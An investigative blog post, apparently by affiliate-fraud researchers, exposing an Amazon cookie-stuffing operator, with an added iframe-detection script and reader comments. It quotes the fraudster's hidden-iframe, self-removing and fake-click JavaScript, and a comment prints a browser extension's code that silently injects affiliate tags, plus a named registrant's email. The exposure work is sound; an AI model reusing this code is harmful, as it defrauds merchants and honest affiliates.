Cellphonetech stuffing Amazon cookies with heightened concealment

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here phonearena.com (much like the fraudster who targeted Venturebeat).

[Screenshot: phonearena - affiliate fraud 1]

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

ExternalInterface.call("function(fffff) 
{ 
  var xxxxx = document.createElement (\'iframe\'); 
  xxxxx.id = \'xxxxx\'; 
  xxxxx.name = \'xxxxx\'; 
  xxxxx.style.visibility = \'hidden\'; 
  xxxxx.style.width = \'1px\';  
  xxxxx.style.height = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
{ 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 }; 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.
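An added example (not code from the post) of how an investigator can beat the ten-second window: every iframe attached to the page is recorded together with the signals described above (CSS-hidden, 1x1, third-party src) and its removal time, so the evidence survives the removal. The record logic is plain JavaScript; installObserver() assumes a browser DOM, and pageHost is the hostname of the page being watched.

```javascript
// Added example (not code from the post): record iframes that are CSS-hidden,
// 1x1 and off-site, so their src and lifetime survive the ten-second removal.
// Signals the post singles out: hidden, 1x1, and a src on a third-party host.
function suspiciousSignals(desc, pageHost) {
  const out = [];
  if (desc.hidden) out.push('css-hidden');
  if (desc.width <= 1 && desc.height <= 1) out.push('1x1');
  try {
    const host = new URL(desc.src, 'https://' + pageHost + '/').hostname;
    if (host && host !== pageHost) out.push('third-party:' + host);
  } catch (e) { /* empty or malformed src is not a signal on its own */ }
  return out;
}

// Every attached iframe stays in `seen` with its removal time, so a transient one
// leaves evidence after it is gone. `el` is a real <iframe> or an object like it.
function createRecorder(pageHost) {
  const seen = [];
  return {
    onAdded(el, now) {
      const s = el.style || {};
      const rec = {
        src: el.src || '',
        hidden: s.visibility === 'hidden' || s.display === 'none',
        width: parseInt(s.width, 10) || 0, height: parseInt(s.height, 10) || 0,
        insertedAt: now, removedAt: null,
      };
      rec.signals = suspiciousSignals(rec, pageHost);
      seen.push(rec);
      return rec;
    },
    onRemoved(el, now) {
      const rec = seen.find(r => r.src === (el.src || '') && r.removedAt === null);
      if (rec) rec.removedAt = now;
      return rec;
    },
    // Two or more signals is worth a look; lifetimeMs is null while still attached.
    flagged: () => seen.filter(r => r.signals.length >= 2).map(r => ({
      src: r.src, signals: r.signals,
      lifetimeMs: r.removedAt === null ? null : r.removedAt - r.insertedAt })),
  };
}
// Browser hookup (assumes a DOM): watch iframe insertions/removals under <body>.
function installObserver(recorder) {
  const each = (nodes, fn) => nodes.forEach(n => n.tagName === 'IFRAME' && fn(n, Date.now()));
  const obs = new MutationObserver(ms => ms.forEach(m => {
    each(m.addedNodes, recorder.onAdded); each(m.removedNodes, recorder.onRemoved); }));
  obs.observe(document.body, { childList: true, subtree: true });
  return obs;
}
```

In a page, `installObserver(createRecorder(location.hostname))` starts recording; call `flagged()` at any later time to see what was inserted and how long it lived.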

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide — recall Direct Revenue’s dozens of company names.  (By using multiple names, companies seek to avoid the notoriety and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows he is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="http://www.cellphonetech.net/ads/files/xx.php?dtecebenelcedteuea...";
var xxx = document.createElement ("a");
if (typeof(xxx.click) == 'undefined')
{ location.href = url;  }
else
{ xxx.href = url; document.body.appendChild(xxx); xxx.click(); }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combine this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM, and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:


Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address joannatse01@gmail.com.


5 Comments

  1. Thomas
    November 15, 2013

    I found a scammer myself.
    This chrome app (reported, so link will no longer work soon, I hope): https://chrome.google.com/webstore/detail/hide-seen-messages-for-fa/lfhfeiibjklgollkbbooaakbfhjinjjl/details
    inserts an amazon affiliate ID:

    chrome.tabs.onUpdated.addListener(function(e,t,n){var r="donations09-20";if(localStorage["affiliate_tag"]!==""&&localStorage["affiliate_tag"]!==undefined){r=localStorage["affiliate_tag"]}var i="chrome0f-20";if(localStorage["affiliate_tag_ca"]!==""&&localStorage["affiliate_tag_ca"]!==undefined){i=localStorage["affiliate_tag_ca"]}var s="chrome03-21";if(localStorage["affiliate_tag_couk"]!==""&&localStorage["affiliate_tag_couk"]!==undefined){s=localStorage["affiliate_tag_couk"]}var o="chrome0f-21";if(localStorage["affiliate_tag_de"]!==""&&localStorage["affiliate_tag_de"]!==undefined){o=localStorage["affiliate_tag_de"]}var u="chrome0a-21";if(localStorage["affiliate_tag_es"]!==""&&localStorage["affiliate_tag_es"]!==undefined){u=localStorage["affiliate_tag_es"]}var a="chrome08-21";if(localStorage["affiliate_tag_fr"]!==""&&localStorage["affiliate_tag_fr"]!==undefined){a=localStorage["affiliate_tag_fr"]}var f="chrome07-21";if(localStorage["affiliate_tag_it"]!==""&&localStorage["affiliate_tag_it"]!==undefined){f=localStorage["affiliate_tag_it"]}var l="chrome00-22";if(localStorage["affiliate_tag_cojp"]!==""&&localStorage["affiliate_tag_cojp"]!==undefined){l=localStorage["affiliate_tag_cojp"]}var 
c="chrome0a-23";if(localStorage["affiliate_tag_cn"]!==""&&localStorage["affiliate_tag_cn"]!==undefined){c=localStorage["affiliate_tag_cn"]}if(t.status=="loading"){if(n.url.indexOf("www.amazon.com")>0&&n.url.indexOf(r)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+r}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.ca")>0&&n.url.indexOf(i)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+i}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.co.uk")>0&&n.url.indexOf(s)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+s}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.de")>0&&n.url.indexOf(o)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+o}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.es")>0&&n.url.indexOf(u)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+u}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.fr")>0&&n.url.indexOf(a)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+a}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.it")>0&&n.url.indexOf(f)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+f}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.co.jp")>0&&n.url.indexOf(l)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+l}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.cn")>0&&n.url.indexOf(c)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+c}chrome.tabs.update(e,{url:n.url+h})}}});

  2. wesleyb
    November 15, 2013

    Note the different tags for each of the different regions. If this is doing what I think it’s doing then this is a good find.

  3. Bill
    November 18, 2013

    So how is he doing it? You have to install the app first?

  4. wesleyb
    November 18, 2013

    Yes

  5. Bill
    November 18, 2013

    Is this something similar to lilyjade?